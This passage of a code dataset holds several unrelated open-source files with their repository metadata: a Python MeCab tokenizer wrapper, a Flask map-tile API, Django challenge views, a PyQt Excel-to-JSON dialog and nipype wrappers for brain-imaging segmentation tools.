{"api_name": "discord.ext.commands.command", "line_number": 89, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "14877239969", "text": "#-*- coding:utf-8 -*-\n__author__ = 'kensuke-mi'\n\nimport io_operator\nimport sys\nimport MeCab\nimport logging\nimport subprocess\nlogging.basicConfig(level=logging.DEBUG,\n                    format=\"%(asctime)s %(levelname)s %(message)s\")\n\n\"\"\"\nCalls MeCab and splits sentences into sets of words.\n\"\"\"\n\ndef __check_mecab_dict_path__(osType):\n\n    if osType==\"mac\":\n        mecab_dic_cmd = 'echo `mecab-config --dicdir`'\n    elif osType==\"centos\":\n        mecab_dic_cmd = \"echo `/usr/local/bin/mecab-config --dicdir`\"\n\n\n    path_mecab_dict = subprocess.check_output( mecab_dic_cmd, shell=True ).strip(u'\\n')\n\n    return path_mecab_dict\n\n\ndef __check_mecab_libexe__(osType):\n\n    if osType==\"mac\":\n        mecab_libexe_cmd = 'echo `mecab-config --libexecdir`'\n    elif osType==\"centos\":\n        mecab_libexe_cmd = \"echo `/usr/local/bin/mecab-config --libexecdir`\"\n\n    path_mecab_libexe = subprocess.check_output( mecab_libexe_cmd, shell=True ).strip(u'\\n')\n\n    return path_mecab_libexe\n\n\ndef __CompileUserdict(pathUserdict, osType=\"mac\"):\n    # compile the compound-word user dictionary\n\n    #userDictLines = [\n    #    line.strip(u'\\n')\n    #    for line in codecs.open(pathUserdict, 'r', 'utf-8').readlines()\n    #    if line[0] != u'#' and line != u'\\n']\n\n    path_mecab_dict = __check_mecab_dict_path__(osType)\n    path_mecab_libexe = __check_mecab_libexe__(osType)\n\n    cmCompileDict =
u'{0}/mecab-dict-index -d {1}/ipadic -u {2} -f utf-8 -t utf-8 {3} > /dev/null'.format(path_mecab_libexe,\n path_mecab_dict,\n pathUserdict.replace(\"csv\", \"dict\"),\n pathUserdict)\n logging.debug(msg=\"compiling mecab user dictionary with: {}\".format(cmCompileDict))\n try:\n subprocess.call( cmCompileDict , shell=True )\n except OSError as e:\n logging.error('type:' + str(type(e)))\n logging.error('args:' + str(e.args))\n logging.error('message:' + e.message)\n sys.exit('Failed to compile mecab userdict. System ends')\n\n return pathUserdict.replace(\"csv\", \"dict\")\n\n\n\ndef __CallMecab(pathUserDictCsv, pathNeologd, osType, mode='all'):\n \"\"\"\n Mecabの呼び出すをする\n :return:\n \"\"\"\n if mode == 'neologd':\n logging.debug('Use neologd additional dictionary')\n cmMecabInitialize = '-d {}'.format(pathNeologd)\n\n elif mode == 'all':\n logging.debug('Use neologd additional dictionary')\n pathUserDict = __CompileUserdict(pathUserDictCsv, osType)\n cmMecabInitialize = '-u {} -d {}'.format(pathUserDict, pathNeologd)\n\n\n cmMecabCall = \"-Ochasen {}\".format(cmMecabInitialize)\n logging.debug(msg=\"mecab initialized with {}\".format(cmMecabCall))\n\n try:\n mecabObj = MeCab.Tagger(cmMecabCall)\n except Exception as e:\n logging.error(e.args)\n logging.error(e.message)\n logging.error(e.args)\n sys.exit(\"Possibly Path to userdict is invalid check the path\")\n\n return mecabObj\n\n\ndef __feature_parser__(uni_feature, word_surface):\n \"\"\"\n Parse the POS feature output by Mecab\n :param uni_feature unicode:\n :return ( (pos1, pos2, pos3), word_stem ):\n \"\"\"\n list_feature_items = uni_feature.split(u',')\n pos1 = list_feature_items[0]\n pos2 = list_feature_items[1]\n pos3 = list_feature_items[2]\n tuple_pos = ( pos1, pos2, pos3 )\n\n # if without constraint(output is normal mecab dictionary like)\n if len(list_feature_items) == 9:\n word_stem = list_feature_items[6]\n # if with constraint(output format depends on Usedict.txt)\n else:\n word_stem = word_surface\n\n return tuple_pos, word_stem\n\n\ndef __split_mode_Ochasen_userdict__(sentence, mecabObj):\n \"\"\"\n :param sentence:\n :param ins_mecab:\n :param list_stopword:\n :param list_pos_candidate:\n :return: list [tuple (unicode, unicode)]\n \"\"\"\n list_sentence_processed = [] # list to save word stem of posted contents\n # don't delete this variable. 
encoded_text protects sentence from deleting\n encoded_text = sentence.encode('utf-8')\n\n node = mecabObj.parseToNode(encoded_text)\n node = node.next\n while node.next is not None:\n word_surface = node.surface.decode('utf-8')\n tuple_pos, word_stem = __feature_parser__(node.feature.decode('utf-8'), word_surface)\n list_sentence_processed.append( (word_stem, tuple_pos) )\n\n node = node.next\n\n return list_sentence_processed\n\n\ndef __JsonSave(pathSave, documentObj):\n \"\"\"\n\n :return:\n \"\"\"\n logging.debug(\"analyzed document is saved at: {}\".format(pathSave))\n io_operator.JsonOperator(pathSave, any_data=documentObj).write_json()\n\n\ndef __JsonLoad(documentPath):\n \"\"\"\n\n :return:\n \"\"\"\n documentObj = io_operator.JsonOperator(path_to_json=documentPath).load_json()\n return documentObj\n\n\ndef __SentenceExtractor__(documentObjects):\n sentences = [\n (index, fumanObject)\n for index, fumanObject in enumerate(documentObjects['inputArray'])\n ]\n return sentences\n\n\ndef __SentenceSpliter__(sentences, mecabObj):\n analyzedResults = {\n int(sentence[0]): __split_mode_Ochasen_userdict__(sentence[1], mecabObj)\n for sentence in sentences\n }\n return analyzedResults\n\n\ndef MecabWrapperMain(pathUserDictCsv, documentPath, pathAnalyzedData, osType=\"mac\",\n pathNeologd=\"/usr/local/lib/mecab/dic/mecab-ipadic-neologd/\"):\n\n\n mecabObj = __CallMecab(pathUserDictCsv, pathNeologd, osType)\n\n documentObjects = __JsonLoad(documentPath)\n sentences = __SentenceExtractor__(documentObjects)\n analyzedResults = __SentenceSpliter__(sentences, mecabObj)\n\n __JsonSave(pathAnalyzedData, analyzedResults)\n logging.debug(\"analyzed result is saved into {}\".format(pathAnalyzedData))\n\n return pathAnalyzedData\n\n\ndef __test():\n import os\n\n abs_path = os.path.abspath(sys.argv[0])\n abs_path_dir = os.path.dirname(abs_path)\n sys.path.append(abs_path_dir)\n os.chdir(abs_path_dir)\n\n pathUserDictCsv=\"../resources/termExtractDict.csv\"\n pathNeologd=\"/usr/local/lib/mecab/dic/mecab-ipadic-neologd/\"\n osType=\"mac\"\n mecabObj = __CallMecab(pathUserDictCsv, pathNeologd, osType)\n\n documentPath = \"../resources/input.json\"\n documentObjects = __JsonLoad(documentPath)\n sentences = __SentenceExtractor__(documentObjects)\n analyzedResults = __SentenceSpliter__(sentences, mecabObj)\n\n\n pathAnalyzedData = \"../resources/analyzed_data.json\"\n __JsonSave(pathAnalyzedData, analyzedResults)\n\n\nif __name__ == \"__main__\":\n __test()\n\n", "repo_name": "Kensuke-Mitsuzawa/docker-termExtract-jsonIO", "sub_path": "dockerfiles/python_modules/wrapper_mecab.py", "file_name": "wrapper_mecab.py", "file_ext": "py", "file_size_in_byte": 6775, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 9, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 24, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 61, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, 
{"api_name": "logging.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 85, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 88, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 149, "usage_type": "call"}, {"api_name": "io_operator.JsonOperator", "line_number": 150, "usage_type": "call"}, {"api_name": "io_operator.JsonOperator", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 199, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "31766735838", "text": "import json\nimport logging\nimport numpy as np\nfrom flask import jsonify, request, send_file\nfrom flask_jwt import jwt_required\nfrom cStringIO import StringIO\nfrom sqlalchemy import case\n\nimport tmlib.models as tm\nfrom tmlib.image import PyramidTile\n\nfrom tmserver.api import api\nfrom tmserver.util import (\n decode_query_ids, decode_form_ids, assert_query_params, assert_form_params\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@api.route(\n '/experiments//channel_layers//tiles',\n methods=['GET']\n)\n@assert_query_params('x', 'y', 'z')\n@decode_query_ids(None)\ndef get_channel_layer_tile(experiment_id, channel_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/channel_layer/(string:channel_layer_id)/tiles\n\n Sends a :class:`ChannelLayerTile /segmentation_layers//tiles',\n methods=['GET']\n)\n@assert_query_params('x', 'y', 'z')\n@decode_query_ids(None)\ndef get_segmentation_layer_tile(experiment_id, segmentation_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/segmentation_layers/(string:segmentation_layer_id)/tile\n\n Sends each the geometric representation of each\n :class:`MapobjectSegmentation `\n as a GeoJSON feature collection that intersect with the given Pyramid\n tile at position x, y, z.\n\n **Example response**:\n\n .. 
sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"type\": \"FeatureCollection\",\n \"features\": [\n \"type\": \"Feature\",\n \"id\": 1,\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [x1, y1], [x2, y2], ...\n ]]\n },\n \"properties\": {\n \"type\": \"Cells\"\n }\n ...\n ]\n }\n\n :query x: zero-based `x` coordinate\n :query y: zero-based `y` coordinate\n :query z: zero-based zoom level index\n\n :statuscode 200: no error\n :statuscode 400: malformed request\n\n \"\"\"\n # The coordinates of the requested tile\n x = request.args.get('x', type=int)\n y = request.args.get('y', type=int)\n # \"z\" is the pyramid zoom level and \"zlevel\" the z-resolution of the\n # acquired image\n z = request.args.get('z', type=int)\n\n logger.debug(\n 'get tile for segmentation layer %d : x=%d, y=%d, z=%d',\n segmentation_layer_id, x, y, z\n )\n\n # if mapobject_type_name == 'DEBUG_TILE':\n # with tm.utils.ExperimentSession(experiment_id) as session:\n # layer = session.query(tm.ChannelLayer).first()\n # # TODO: \"maxzoom\" should be stored in Experiment\n # maxzoom = layer.maxzoom_level_index\n # minx, miny, maxx, maxy = tm.SegmentationLayer.get_tile_bounding_box(\n # x, y, z, maxzoom\n # )\n # return jsonify({\n # 'type': 'Feature',\n # 'geometry': {\n # 'type': 'Polygon',\n # 'coordinates': [[\n # [maxx, maxy], [minx, maxy], [minx, miny], [maxx, miny],\n # [maxx, maxy]\n # ]]\n # },\n # 'properties': {\n # 'x': x, 'y': y, 'z': z,\n # 'type': 'DEBUG_TILE'\n # }\n # })\n\n with tm.utils.ExperimentSession(experiment_id) as session:\n segmentation_layer = session.query(tm.SegmentationLayer).get(\n segmentation_layer_id\n )\n outlines = segmentation_layer.get_segmentations(x, y, z)\n mapobject_type_name = segmentation_layer.mapobject_type.name\n\n # Try to estimate how many points there are in total within\n # the polygons of this tile.\n # TODO: Make this more light weight by sending binary coordinates\n # without GEOJSON overhead. Requires a hack on the client side.\n if len(outlines) > 0:\n features = [\n {\n 'type': 'Feature',\n 'id': mapobject_id,\n 'geometry': json.loads(geom_geojson_str),\n 'properties': {\n 'type': mapobject_type_name\n }\n }\n for mapobject_id, geom_geojson_str in outlines\n ]\n else:\n features = []\n\n return jsonify({\n 'type': 'FeatureCollection',\n 'features': features\n })\n\n\n@api.route(\n '/experiments//segmentation_layers//labeled_tiles',\n methods=['GET']\n)\n@decode_query_ids(None)\n@assert_query_params('x', 'y', 'z', 'result_name')\ndef get_segmentation_layer_label_tile(experiment_id, segmentation_layer_id):\n \"\"\"\n .. http:get:: /api/experiments/(string:experiment_id)/segmentation_layers/(string:segmentation_layer_id)/labeled_tiles\n\n Sends each the geometric representation of each\n :class:`MapobjectSegmentation `\n as a GeoJSON feature collection that intersect with the given Pyramid\n tile at position x, y, z together with the\n :class:`LabelValues ` for the specified\n tool :class:`Result `.\n\n **Example response**:\n\n .. 
sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"type\": \"FeatureCollection\",\n \"features\": [\n \"type\": \"Feature\",\n \"id\": 1,\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [x1, y1], [x2, y2], ...\n ]]\n },\n \"properties\": {\n \"label\": 123\n }\n ...\n ]\n }\n\n :query x: zero-based `x` coordinate\n :query y: zero-based `y` coordinate\n :query z: zero-based zoom level index\n\n :statuscode 400: malformed request\n :statuscode 200: no error\n\n \"\"\"\n # The coordinates of the requested tile\n x = request.args.get('x', type=int)\n y = request.args.get('y', type=int)\n z = request.args.get('z', type=int)\n result_name = request.args.get('result_name')\n\n logger.debug(\n 'get labeled tile for segmentation layer of tool result \"%s\": '\n 'x=%d, y=%d, z=%d', result_name, x, y, z\n )\n with tm.utils.ExperimentSession(experiment_id) as session:\n segmentation_layer = session.query(tm.SegmentationLayer).\\\n get(segmentation_layer_id)\n outlines = segmentation_layer.get_segmentations(x, y, z)\n mapobject_type = segmentation_layer.mapobject_type\n mapobject_type_name = mapobject_type.name\n\n result = session.query(tm.ToolResult).\\\n filter_by(name=result_name, mapobject_type_id=mapobject_type.id).\\\n one()\n\n if len(outlines) > 0:\n mapobject_ids = [c.mapobject_id for c in outlines]\n mapobject_id_to_label = result.get_labels(mapobject_ids)\n features = [\n {\n 'type': 'Feature',\n 'id': mapobject_id,\n 'geometry': json.loads(geom_geojson_str),\n 'properties': {\n 'label': str(mapobject_id_to_label[mapobject_id])\n }\n }\n for mapobject_id, geom_geojson_str in outlines\n ]\n else:\n features = []\n\n return jsonify({\n 'type': 'FeatureCollection',\n 'features': features\n })\n\n", "repo_name": "TissueMAPS/TissueMAPS", "sub_path": "tmserver/tmserver/api/tile.py", "file_name": "tile.py", "file_ext": "py", "file_size_in_byte": 9424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 46, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 46, "usage_type": "name"}, {"api_name": "tmlib.models.ChannelLayer", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 47, "usage_type": "name"}, {"api_name": "tmlib.models.ChannelLayerTile", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 52, "usage_type": "name"}, {"api_name": "tmlib.image.PyramidTile.create_as_background", "line_number": 63, "usage_type": "call"}, {"api_name": "tmlib.image.PyramidTile", "line_number": 
63, "usage_type": "name"}, {"api_name": "cStringIO.StringIO", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 68, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 20, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 20, "usage_type": "name"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 24, "usage_type": "call"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 124, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 124, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 154, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 154, "usage_type": "name"}, {"api_name": "tmlib.models.SegmentationLayer", "line_number": 155, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 155, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 180, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 71, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 71, "usage_type": "name"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 75, "usage_type": "call"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 237, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 238, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 240, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 240, "usage_type": "name"}, {"api_name": "tmlib.models.utils.ExperimentSession", "line_number": 246, "usage_type": "call"}, {"api_name": "tmlib.models.utils", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 246, "usage_type": "name"}, {"api_name": "tmlib.models.SegmentationLayer", "line_number": 247, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 247, "usage_type": "name"}, {"api_name": "tmlib.models.ToolResult", "line_number": 
253, "usage_type": "attribute"}, {"api_name": "tmlib.models", "line_number": 253, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 264, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 274, "usage_type": "call"}, {"api_name": "tmserver.api.api.route", "line_number": 186, "usage_type": "call"}, {"api_name": "tmserver.api.api", "line_number": 186, "usage_type": "name"}, {"api_name": "tmserver.util.decode_query_ids", "line_number": 190, "usage_type": "call"}, {"api_name": "tmserver.util.assert_query_params", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "28954125551", "text": "from urllib import response\nfrom django.shortcuts import render\nfrom django.http import Http404, HttpResponseNotFound, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.template.loader import render_to_string\n# Create your views here.\n\n\n# def january(request):\n# return HttpResponse(\"Eat no meat for the entire month\")\n\n# def february(request):\n# return HttpResponse(\"Walk for atleast 20 mins everyday!\")\n\n# def march(request):\n# return HttpResponse(\"Learn Django for 20 mins everyday!\")\n\nmonthly_challenges = {\n \"january\" : \"Eat no meat for the entire month\" ,\n \"february\" : \"Walk for atleast 20 mins everyday!\",\n \"march\" : \"Learn Django for 20 mins everyday!\",\n \"april\" : \"Eat no meat for the entire month\" ,\n \"may\" : \"Walk for atleast 20 mins everyday!\",\n \"june\" : \"Learn Django for 20 mins everyday!\",\n \"july\" : \"Eat no meat for the entire month\" ,\n \"august\" : \"Walk for atleast 20 mins everyday!\",\n \"september\" : \"Learn Django for 20 mins everyday!\",\n \"october\" : \"Eat no meat for the entire month\" ,\n \"november\" : \"Walk for atleast 20 mins everyday!\",\n \"december\" : None\n}\n\ndef index(request):\n # list_items = \"\"\n months = list(monthly_challenges.keys())\n\n # for month in months:\n # capitalise_month = month.capitalize()\n # month_path = reverse(\"month-challenge\", args=[month])\n # list_items += f\"
<li><a href=\\\"{month_path}\\\">{capitalise_month}</a></li>\"\n    \n    # response_data = f\"<ul>{list_items}</ul>
    \"\n return render(request, \"challenges/index.html\",{\n \"months\" : months\n })\n\ndef monthly_challenge_by_number(request,month):\n months = list(monthly_challenges.keys())\n\n if month > len(months) :\n return HttpResponseNotFound(\"Invalid month!\")\n\n redirect_month = months[month-1]\n redirect_path = reverse(\"month-challenge\",args=[redirect_month])#/challenge\n return HttpResponseRedirect( redirect_path)\n \ndef monthly_challenge(request, month):\n try:\n challenge_text = monthly_challenges[month]\n return render(request,\"challenges/challenge.html\",{\n \"text\" : challenge_text,\n \"month\" : month\n })\n # response_data = render_to_string(\"challenges/challenge.html\")\n # return HttpResponse(response_data)\n except:\n #response_data = render_to_string(\"404.html\")\n raise Http404()\n ", "repo_name": "Ramanagamani1/Django", "sub_path": "myapp/challenges/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.HttpResponseNotFound", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "20564661331", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: zyj\n@time: 2023/1/5 15:52\n\"\"\"\n\nimport sys\nfrom parseExcel2 import Ui_Dialog\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QListView\nfrom utils import parseExcel2json\n\nclass UI(QtWidgets.QDialog, Ui_Dialog):\n def __init__(self):\n super(UI, self).__init__()\n self.setupUi(self)\n self.pushButton_selectFile.clicked.connect(self.selectFile)\n self.pushButton_transform.clicked.connect(self.transform)\n\n def selectFile(self):\n self.excelPath, _ = QFileDialog.getOpenFileName(self, \"选择文件\", \"\", \"Excel Files (*.xlsx *.xls *.csv)\")\n print(self.excelPath)\n if self.excelPath:\n self.textBrowser.setText(self.excelPath)\n\n def transform(self):\n if self.excelPath:\n #self.textBrowser.clear()\n self.textBrowser.setText(parseExcel2json(self.excelPath))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ui = UI()\n ui.show()\n sys.exit(app.exec_())\n", "repo_name": "zyj20200/ZTools", "sub_path": "parseExcel/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 13, "usage_type": "name"}, {"api_name": "parseExcel2.Ui_Dialog", "line_number": 13, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 21, "usage_type": "name"}, {"api_name": "utils.parseExcel2json", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 33, 
"usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "27374213317", "text": "from nipype.interfaces.base import (\n TraitedSpec, traits, File, CommandLineInputSpec, CommandLine,\n BaseInterfaceInputSpec, Directory, BaseInterface)\nimport os\nimport glob\nfrom nipype.interfaces.base import isdefined\nfrom core.utils.filemanip import split_filename\ntry:\n from nnunet.inference.predict import predict_from_folder\n import torch\nexcept ModuleNotFoundError:\n print('Cannot find import nnUNet, no brain extraction or tumor '\n 'segmentation can be performed!')\n\n\nBASH_PATH = os.path.abspath(os.path.join(os.path.split(__file__)[0],\n os.pardir, os.pardir, 'bash'))\n\n\nclass HDBetInputSpec(CommandLineInputSpec):\n \n _mode_types = ['accurate', 'fast']\n input_file = File(mandatory=True, desc='existing input image',\n argstr='-i %s', exists=True)\n out_file = traits.Str(argstr='-o %s', desc='output file (or folder) name.')\n mode = traits.Enum(*_mode_types, argstr='-mode %s',\n desc='Fast will use only one set of parameters whereas '\n 'accurate will use the five sets of parameters '\n 'that resulted from our cross-validation as an '\n 'ensemble. Default: accurate')\n device = traits.Str(argstr='-device %s',\n desc='Used to set on which device the prediction will run.'\n 'Must be either int or str. Use int for GPU id or \"cpu\" '\n 'to run on CPU. When using CPU you should consider '\n 'disabling tta. Default for -device is: 0')\n tta = traits.Int(argstr='-tta %i',\n desc='Whether to use test time data augmentation '\n '(mirroring). 1= True, 0=False. Disable this if you are '\n 'using CPU to speed things up! Default: 1')\n post_processing = traits.Int(argstr='-pp %i',\n desc='Set to 0 to disabe postprocessing '\n '(remove all but the largest connected '\n 'component in the prediction. 
Default: 1')\n save_mask = traits.Int(argstr='-s %i',\n desc='If set to 0 the segmentation mask will not be saved')\n overwrite_existing = traits.Int(argstr='--overwrite_existing %i',\n desc='Set this to 0 if you do not want to'\n ' overwrite existing predictions')\n\n\nclass HDBetOutputSpec(TraitedSpec):\n\n out_file = File(desc='Brain extracted image.')\n out_mask = File(desc='Brain mask.')\n\n\nclass HDBet(CommandLine):\n\n _cmd = 'hd-bet'\n input_spec = HDBetInputSpec\n output_spec = HDBetOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['out_file'] = self._gen_outfilename('out_file')\n if isdefined(self.inputs.save_mask and self.inputs.save_mask != 0):\n outputs['out_mask'] = self._gen_outfilename('out_mask')\n\n return outputs\n\n def _gen_outfilename(self, name):\n if name == 'out_file':\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.input_file):\n _, _, ext = split_filename(self.inputs.input_file)\n out_file = self.inputs.out_file+ext\n if not isdefined(out_file) and isdefined(self.inputs.input_file):\n pth, fname, ext = split_filename(self.inputs.input_file)\n print(pth, fname, ext)\n out_file = os.path.join(pth, fname+'_bet'+ext)\n elif name == 'out_mask':\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.input_file):\n _, _, ext = split_filename(self.inputs.input_file)\n out_file = self.inputs.out_file+'_mask'+ext\n# if isdefined(out_file):\n# pth, fname, ext = split_filename(out_file)\n# out_file = os.path.join(pth, fname+'_bet_mask'+ext)\n elif not isdefined(out_file) and isdefined(self.inputs.input_file):\n pth, fname, ext = split_filename(self.inputs.input_file)\n print(pth, fname, ext)\n out_file = os.path.join(pth, fname+'_bet_mask'+ext)\n\n return os.path.abspath(out_file)\n\n def _gen_filename(self, name):\n if name == 'out_file':\n return self._gen_outfilename('out_file')\n elif name == 'out_mask':\n return self._gen_outfilename('out_mask')\n return None\n\n\nclass HDGlioPredictInputSpec(CommandLineInputSpec):\n\n t1 = traits.File(mandatory=True, exists=True, argstr='-t1 %s',\n desc='T1 weighted image')\n ct1 = traits.File(mandatory=True, exists=True, argstr='-t1c %s',\n desc='T1 weighted image')\n t2 = traits.File(mandatory=True, exists=True, argstr='-t2 %s',\n desc='T1 weighted image')\n flair = traits.File(mandatory=True, exists=True, argstr='-flair %s',\n desc='T1 weighted image')\n out_file = traits.Str(argstr='-o %s', desc='output file (or folder) name.')\n\n\nclass HDGlioPredictOutputSpec(TraitedSpec):\n\n out_file = File(desc='Brain extracted image.')\n\n\nclass HDGlioPredict(CommandLine):\n\n _cmd = 'hd_glio_predict'\n input_spec = HDGlioPredictInputSpec\n output_spec = HDGlioPredictOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['out_file'] = self._gen_outfilename()\n\n return outputs\n\n def _gen_outfilename(self):\n\n out_file = self.inputs.out_file\n if isdefined(out_file) and isdefined(self.inputs.t1):\n _, _, ext = split_filename(self.inputs.t1)\n out_file = self.inputs.out_file+ext\n if not isdefined(out_file) and isdefined(self.inputs.t1):\n pth, _, ext = split_filename(self.inputs.t1)\n print(pth, ext)\n out_file = os.path.join(pth, 'segmentation'+ext)\n\n return os.path.abspath(out_file)\n\n\nclass NNUnetInferenceInputSpec(CommandLineInputSpec):\n\n input_folder = Directory(exist=True, mandatory=True,\n desc='Input directory', argstr='-i %s')\n output_folder = Directory(genfile=True,\n desc='Output 
